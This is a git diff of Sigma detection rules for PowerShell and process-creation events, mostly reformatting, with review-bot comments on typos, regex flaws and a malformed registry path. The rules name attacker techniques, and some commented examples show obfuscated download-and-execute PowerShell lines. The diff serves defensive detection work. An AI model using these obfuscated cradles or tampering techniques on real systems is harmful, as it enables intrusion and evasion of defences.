@@ -1,17 +1,15 @@ title: Tamper Windows Defender - ScriptBlockLogging id: 14c71865-6cd3-44ae-adaa-1db923fae5f2 related: - - id: ec19ebab-72dc-40e1-9728-4c0b805d722c - type: derived + - id: ec19ebab-72dc-40e1-9728-4c0b805d722c + type: derived status: experimental -description: Detects PowerShell scripts attempting to disable scheduled scanning and - other parts of Windows Defender ATP or set default actions to allow. +description: Detects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://bidouillesecurity.com/disable-windows-defender-in-powershell/ -author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, - Nasreddine Bencherchali (Nextron Systems) +author: frack113, elhoim, Tim Shelton (fps, alias support), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/01/16 modified: 2024/01/02 tags: @@ -89,7 +87,6 @@ detection: - stdefac Allow condition: ps_script and (all of selection_options_disabling_* or all of selection_other_default_actions_*) falsepositives: - - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting - purposes. Must be investigated. + - Legitimate PowerShell scripts that disable Windows Defender for troubleshooting purposes. Must be investigated. level: high ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml b/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml index 660e5d1d3..d9b621c5c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_test_netconnection.yml 
@@ -1,13 +1,9 @@ title: Testing Usage of Uncommonly Used Port id: adf876b3-f1f8-4aa9-a4e4-a64106feec06 status: test -description: 'Adversaries may communicate using a protocol and port paring that are - typically not associated. - - For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: - Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. - - ' +description: | + Adversaries may communicate using a protocol and port paring that are typically not associated. + For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell - https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml b/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml index 4d028ea6f..fa050c35a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_timestomp.yml 
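Review bot: The new description still reads `protocol and port paring` (should be `pairing`) and carries the wiki citation markup `(Citation: Symantec Elfin Mar 2019)` and `(Citation: Fortinet Agent Tesla April 2018)`, which is meaningless outside the source it was copied from. Since the block is being rewritten anyway, the second line could read `For example, HTTPS over port 8088 or port 587 as opposed to the traditional port 443.`, with the two cited reports added to `references` as URLs if they are wanted. The timestomp hunk on the same line is a plain reflow.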
@@ -1,13 +1,9 @@ title: Powershell Timestomp id: c6438007-e081-42ce-9483-b067fbef33c3 status: test -description: 'Adversaries may modify file time attributes to hide new or changes to - existing files. - - Timestomping is a technique that modifies the timestamps of a file (the modify, - access, create, and change times), often to mimic files that are in the same folder. - - ' +description: | + Adversaries may modify file time attributes to hide new or changes to existing files. + Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md - https://www.offensive-security.com/metasploit-unleashed/timestomp/ diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml index 196b1e6de..2b148d2a4 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_token_obfuscation.yml @@ -1,8 +1,8 @@ title: Powershell Token Obfuscation - Powershell id: f3a98ce4-6164-4dd4-867c-4d83de7eca51 related: - - id: deb9b646-a508-44ee-b7c9-d8965921c6b6 - type: similar + - id: deb9b646-a508-44ee-b7c9-d8965921c6b6 + type: similar status: experimental description: Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation references: 
@@ -24,13 +24,19 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection: - - ScriptBlockText|re: \w+`(\w+|-|.)`[\w+|\s] - - ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f' - - ScriptBlockText|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} + # Examples: + # IN`V`o`Ke-eXp`ResSIOn (Ne`W-ob`ject Net.WebClient).DownloadString + # &('In'+'voke-Expressi'+'o'+'n') (.('New-Ob'+'jec'+'t') Net.WebClient).DownloadString + # &("{2}{3}{0}{4}{1}"-f 'e','Expression','I','nvok','-') (&("{0}{1}{2}"-f'N','ew-O','bject') Net.WebClient).DownloadString + # ${e`Nv:pATh} + - ScriptBlockText|re: \w+`(\w+|-|.)`[\w+|\s] + # - ScriptBlockText|re: '\((\'(\w|-|\.)+\'\+)+\'(\w|-|\.)+\'\)' TODO: fixme + - ScriptBlockText|re: '"(\{\d\}){2,}"\s*-f' # trigger on at least two placeholders. One might be used for legitimate string formatting + - ScriptBlockText|re: \$\{((e|n|v)*`(e|n|v)*)+:path\}|\$\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\}|\$\{env:((p|a|t|h)*`(p|a|t|h)*)+\} filter_chocolatey: ScriptBlockText|contains: - - it will return true or false instead - - The function also prevents `Get-ItemProperty` from failing + - it will return true or false instead # Chocolatey install script https://github.com/chocolatey/chocolatey + - The function also prevents `Get-ItemProperty` from failing # https://docs.chocolatey.org/en-us/create/functions/get-uninstallregistrykey filter_exchange: Path|startswith: C:\Program Files\Microsoft\Exchange Server\ Path|endswith: \bin\servicecontrol.ps1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml b/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml index 43e518fc4..2ee5f1b30 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_user_discovery_get_aduser.yml 
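Review bot: The second example in the new comment block, `&('In'+'voke-Expressi'+'o'+'n') …`, is not matched by any active pattern, because the string-concatenation regex that would cover it is the one commented out with `TODO: fixme` two lines below; the example list should either mark that case as not yet covered or be limited to what the three live regexes match. Separately, the trailing `[\w+|\s]` in the first regex is a character class, so `+` and `|` are literal characters rather than a quantifier and an alternation — if the intent was "a word or whitespace follows the closing backtick", it should read `(\w+|\s)`; confirm against the rule's test cases before changing it. The `TODO: fixme` line should also say what is wrong with that pattern (over-matching, backtracking, or YAML quoting) so the next editor can finish it.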
@@ -1,11 +1,10 @@ title: User Discovery And Export Via Get-ADUser Cmdlet - PowerShell id: c2993223-6da8-4b1a-88ee-668b8bf315e9 related: - - id: 1114e048-b69c-4f41-bc20-657245ae6e3f - type: similar + - id: 1114e048-b69c-4f41-bc20-657245ae6e3f + type: similar status: test -description: Detects usage of the Get-ADUser cmdlet to collect user information and - output it to a file +description: Detects usage of the Get-ADUser cmdlet to collect user information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -36,7 +35,6 @@ detection: - Add-Content condition: ps_script and selection falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml b/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml index e7e1a0c5b..6e0079029 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_user_profile_tampering.yml 
@@ -1,8 +1,7 @@ title: Potential Persistence Via PowerShell User Profile Using Add-Content id: 05b3e303-faf0-4f4a-9b30-46cc13e69152 status: test -description: Detects calls to "Add-Content" cmdlet in order to modify the content - of the user profile and potentially adding suspicious commands for persistence +description: Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md author: frack113, Nasreddine Bencherchali (Nextron Systems) @@ -26,17 +25,17 @@ detection: ScriptBlockText|contains: Add-Content $profile selection_options: ScriptBlockText|contains: + # Note: You can add more suspicious values - '-Value "IEX ' - -Value "Invoke-Expression - -Value "Invoke-WebRequest - -Value "Start-Process - - '-Value ''IEX ' + - "-Value 'IEX " - -Value 'Invoke-Expression - -Value 'Invoke-WebRequest - -Value 'Start-Process condition: ps_script and (all of selection_*) falsepositives: - - Legitimate administration and tuning scripts that aim to add functionality to - a user PowerShell session + - Legitimate administration and tuning scripts that aim to add functionality to a user PowerShell session level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml b/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml index 2984eed52..d13e42d9d 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml 
@@ -1,12 +1,10 @@ title: Abuse of Service Permissions to Hide Services Via Set-Service - PS id: 953945c5-22fe-4a92-9f8a-a9edc1e522da related: - - id: 514e4c3a-c77d-4cde-a00f-046425e2301e - type: similar + - id: 514e4c3a-c77d-4cde-a00f-046425e2301e + type: similar status: test -description: Detects usage of the "Set-Service" powershell cmdlet to configure a new - SecurityDescriptor that allows a service to be hidden from other utilities such - as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) +description: Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) references: - https://twitter.com/Alh4zr3d/status/1580925761996828672 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml b/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml index 5515ac78a..bb6f0d974 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_veeam_credential_dumping_script.yml @@ -1,8 +1,7 @@ title: Veeam Backup Servers Credential Dumping Script Execution id: 976d6e6f-a04b-4900-9713-0134a353e38b status: experimental -description: Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" - class, in order to dump stored credentials. +description: Detects execution of a PowerShell script that contains calls to the "Veeam.Backup" class, in order to dump stored credentials. references: - https://www.pwndefend.com/2021/02/15/retrieving-passwords-from-veeam-backup-servers/ - https://labs.withsecure.com/publications/fin7-target-veeam-servers 
diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml index 5992c2450..f20f7c683 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml @@ -1,12 +1,10 @@ title: Usage Of Web Request Commands And Cmdlets - ScriptBlock id: 1139d2e2-84b1-4226-b445-354492eba8ba related: - - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d - type: derived + - id: 9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d + type: derived status: test -description: Detects the use of various web request commands with commandline tools - and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock - logs +description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs references: - https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/ - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml index 934ce8f3b..8502678be 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win32_nteventlogfile_usage.yml 
@@ -1,8 +1,7 @@ title: Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScript id: e2812b49-bae0-4b21-b366-7c142eafcde2 status: experimental -description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially - suspicious way (delete, backup, change permissions, etc.) from a PowerShell script +description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script references: - https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml index ac1748626..bb058ed43 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win32_product_install_msi.yml @@ -1,8 +1,7 @@ title: PowerShell WMI Win32_Product Install MSI id: 91109523-17f0-4248-a800-f81d9e7c081d status: test -description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product - class +description: Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml index dfd3243b0..44191d112 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win_api_susp_access.yml 
@@ -1,8 +1,8 @@ title: Potential WinAPI Calls Via PowerShell Scripts id: 03d83090-8cba-44a0-b02f-0b756a050306 related: - - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 - type: similar + - id: ba3f5c1b-6272-4119-9dbd-0bc8d21c2702 + type: similar status: experimental description: Detects use of WinAPI functions in PowerShell scripts references: @@ -19,6 +19,7 @@ logsource: category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: + # Note: Add more suspicious combinations in the form of different selections ps_script: EventID: 4104 Channel: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml b/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml index 652b2a605..75c1ef1ea 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml @@ -1,11 +1,10 @@ title: Windows Defender Exclusions Added - PowerShell id: c1344fa2-323b-4d2e-9176-84b4d4821c88 related: - - id: 17769c90-230e-488b-a463-e05c08e9d48f - type: similar + - id: 17769c90-230e-488b-a463-e05c08e9d48f + type: similar status: test -description: Detects modifications to the Windows Defender configuration settings - using PowerShell to add exclusions +description: Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions references: - https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html author: Tim Rauch diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml b/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml index 55f6e8587..941d72b5c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml 
+++ b/sigma/builtin/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml @@ -1,11 +1,10 @@ title: Windows Firewall Profile Disabled id: 488b44e7-3781-4a71-888d-c95abfacf44d related: - - id: 12f6b752-042d-483e-bf9c-915a6d06ad75 - type: similar + - id: 12f6b752-042d-483e-bf9c-915a6d06ad75 + type: similar status: test -description: Detects when a user disables the Windows Firewall via a Profile to help - evade defense. +description: Detects when a user disables the Windows Firewall via a Profile to help evade defense. references: - https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps - https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml index db4424043..ed3b06e73 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_winlogon_helper_dll.yml 
@@ -1,18 +1,11 @@ title: Winlogon Helper DLL id: 851c506b-6b7c-4ce2-8802-c703009d03c0 status: test -description: 'Winlogon.exe is a Windows component responsible for actions at logon/logoff - as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. - - Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ - and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are - - used to manage additional helper programs and functionalities that support Winlogon. - Malicious modifications to these Registry keys may cause Winlogon to - +description: | + Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. + Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are + used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md author: Timur Zinniatullin, oscd.community diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml index 787f0b9ae..6487e3410 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_persistence.yml 
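Review bot: The registry path in the rewritten description, `HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\`, is missing the separators around the optional `Wow6432Node` component and is not a real key as written; the old side had the same defect, so the reflow carried it over. It should read `HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\`, with the brackets meaning "optional", as in the MITRE technique text that the referenced atomic-red-team T1547.004 page is based on. Stating that source in the description would also tell readers where the wording comes from.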
@@ -1,9 +1,7 @@ title: Powershell WMI Persistence id: 9e07f6e7-83aa-45c6-998e-0af26efd0a85 status: test -description: Adversaries may establish persistence and elevate privileges by executing - malicious content triggered by a Windows Management Instrumentation (WMI) event - subscription. +description: Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md - https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545 @@ -24,16 +22,16 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_ioc: - - ScriptBlockText|contains|all: - - 'New-CimInstance ' - - '-Namespace root/subscription ' - - '-ClassName __EventFilter ' - - '-Property ' - - ScriptBlockText|contains|all: - - 'New-CimInstance ' - - '-Namespace root/subscription ' - - '-ClassName CommandLineEventConsumer ' - - '-Property ' + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName __EventFilter ' + - '-Property ' # is a variable name + - ScriptBlockText|contains|all: + - 'New-CimInstance ' + - '-Namespace root/subscription ' + - '-ClassName CommandLineEventConsumer ' + - '-Property ' # is a variable name condition: ps_script and selection_ioc falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml index 37f65d77f..1de5c48fd 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmi_unquoted_service_search.yml 
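Review bot: The new inline comment `# is a variable name` on both `'-Property '` entries in selection_ioc is ambiguous — it reads as if the matched string itself were a variable name. If the intent is that the value following -Property is caller-chosen and therefore only the flag is matched, say so explicitly: `# only the flag is matched; the value after -Property is a caller-defined variable`. As written, a maintainer could read it as a reason to drop the entry.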
@@ -1,11 +1,10 @@ title: WMIC Unquoted Services Path Lookup - PowerShell id: 09658312-bc27-4a3b-91c5-e49ab9046d1b related: - - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 - type: similar + - id: 68bcd73b-37ef-49cb-95fc-edc809730be6 + type: similar status: test -description: Detects known WMI recon method to look for unquoted service paths, often - used by pentest inside of powershell scripts attackers enum scripts +description: Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml b/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml index c1da1525e..eac7f5afd 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_wmimplant.yml @@ -36,8 +36,11 @@ detection: - ' sched_job ' - ' service_mod ' - ' process_kill ' + # - ' process_start ' - ' active_users ' - ' basic_info ' + # - ' drive_list ' + # - ' installed_programs ' - ' power_off ' - ' vacant_system ' - ' logon_events ' diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml b/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml index b479519bc..7527535c9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_x509enrollment.yml 
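Review bot: The three keywords added as commented-out entries in the WMImplant list (`# - ' process_start '`, `# - ' drive_list '`, `# - ' installed_programs '`) carry no rationale, so the next maintainer cannot tell whether they were dropped as false-positive prone or are pending addition. Presumably they are considered too generic to match reliably; a one-line note above them such as `# Note: the following commands are disabled because the strings are too generic for reliable matching` would make that explicit — adjust the reason if it differs.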
@@ -1,8 +1,8 @@ title: Suspicious X509Enrollment - Ps Script id: 504d63cb-0dba-4d02-8531-e72981aace2c related: - - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 - type: similar + - id: 114de787-4eb2-48cc-abdb-c0b449f93ea4 + type: similar status: test description: Detect use of X509Enrollment references: diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml b/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml index ec627417c..ea7e0dce1 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_xml_iex.yml @@ -1,15 +1,10 @@ title: Powershell XML Execute Command id: 6c6c6282-7671-4fe9-a0ce-a2dcebdc342b status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system. (Citation: TechNet PowerShell) - - Adversaries can use PowerShell to perform a number of actions, including discovery - of information and execution of code - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) + Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests author: frack113 diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml index 1b8ffb057..c336ff127 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_7zip_exfil_dmp_files.yml @@ -1,11 +1,10 @@ title: 7Zip Compressing Dump Files id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 related: - - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc - type: derived + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived status: experimental -description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" - extension, which could be a step in a process of dump file exfiltration. +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,23 +21,22 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_extension: - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp condition: process_creation and (all of selection_*) falsepositives: - - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears - accidentally + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml index 9e5854195..2c4af5a72 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml +++ b/sigma/builtin/process_creation/proc_creation_win_7zip_password_compression.yml 
@@ -1,8 +1,7 @@ title: Compress Data and Lock With Password for Exfiltration With 7-ZIP id: 9fbf5927-5261-4284-a71d-f681029ea574 status: test -description: An adversary may compress or encrypt data that is collected prior to - exfiltration using 3rd party utilities +description: An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md author: frack113 @@ -19,18 +18,18 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains: ' -p' + CommandLine|contains: ' -p' selection_action: - CommandLine|contains: + CommandLine|contains: - ' a ' - ' u ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml b/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml index 3a5b50f8f..641726b23 100644 --- a/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml +++ b/sigma/builtin/process_creation/proc_creation_win_7zip_password_extraction.yml 
@@ -1,8 +1,7 @@ title: Password Protected Compressed File Extraction Via 7Zip id: b717b8fd-6467-4d7d-b3d3-27f9a463af77 status: experimental -description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract - password protected zip files. +description: Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files. references: - https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/ author: Nasreddine Bencherchali (Nextron Systems) @@ -18,22 +17,21 @@ detection: EventID: 4688 Channel: Security selection_img: - - Description|contains: 7-Zip - - NewProcessName|endswith: - - \7z.exe - - \7zr.exe - - \7za.exe - - OriginalFileName: - - 7z.exe - - 7za.exe + - Description|contains: 7-Zip + - NewProcessName|endswith: + - \7z.exe + - \7zr.exe + - \7za.exe + - OriginalFileName: + - 7z.exe + - 7za.exe selection_password: - CommandLine|contains|all: + CommandLine|contains|all: - ' -p' - ' x ' - ' -o' condition: process_creation and (all of selection_*) falsepositives: - - Legitimate activity is expected since extracting files with a password can be - common in some environment. + - Legitimate activity is expected since extracting files with a password can be common in some environment. level: medium ruletype: Sigma diff --git 